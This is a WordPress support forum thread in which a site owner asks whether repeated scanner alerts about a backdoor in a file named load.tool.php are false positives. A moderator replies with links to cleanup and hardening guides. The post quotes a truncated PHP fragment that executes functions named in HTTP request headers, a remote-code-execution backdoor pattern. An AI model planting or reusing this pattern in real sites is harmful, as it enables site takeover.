Title: Possible malware
Last modified: January 7, 2021

---

# Possible malware

 *  [zimmer46](https://wordpress.org/support/users/zimmer46/)
 * (@zimmer46)
 * [5 years, 3 months ago](https://wordpress.org/support/topic/possible-malware-5/)
 * My site recent malware scans keep reporting multiple files as being infected.
   All of them are of the same nature and are reported as some form of backdoor.
   See below. Is there something I can do to either stop this, or are these false
   positives ?
 * Filename: load.tool.php
    File Type: Not a core, theme, or plugin file from wordpress.
   org. Details: This file appears to be installed or modified by a hacker to perform
   malicious activity. If you know about this file you can choose to ignore it to
   exclude it from future scans.
 * The matched text in this file is: <?php\x0a\x0a$_HEADERS = getallheaders();\x0aif(
   isset($_HEADERS[‘If-Modified-Since’])) {\x0a $_admin_l_init = $_HEADERS[‘If-Modified-
   Since’](”, $_HEADERS[‘Clear-Site-Data’]($_HEADERS[‘Server-Timing’]));\x0a …
 * The issue type is: Backdoor:PHP/rce.if-modified.9373
    Description: Injected malware
   code used for remote code execution and site takeovers
 * The page I need help with: _[[log in](https://login.wordpress.org/?redirect_to=https%3A%2F%2Fwordpress.org%2Fsupport%2Ftopic%2Fpossible-malware-5%2F%3Foutput_format%3Dmd&locale=en_US)
   to see the link]_

Viewing 1 replies (of 1 total)

 *  Moderator [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/)
 * (@sterndata)
 * Volunteer Forum Moderator
 * [5 years, 3 months ago](https://wordpress.org/support/topic/possible-malware-5/#post-13877475)
 * Get a fresh cup of coffee, take a deep breath and carefully follow [this guide](https://wordpress.org/support/article/faq-my-site-was-hacked/).
   When you’re done, you may want to implement some (if not all) of [the recommended security measures](https://wordpress.org/support/article/hardening-wordpress/).
 * If you’re unable to clean your site(s) successfully, there are reputable organizations
   that can clean your sites for you. Sucuri and Wordfence are a couple.

Viewing 1 replies (of 1 total)

The topic ‘Possible malware’ is closed to new replies.

 * In: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/)
 * 1 reply
 * 2 participants
 * Last reply from: [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/)
 * Last activity: [5 years, 3 months ago](https://wordpress.org/support/topic/possible-malware-5/#post-13877475)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics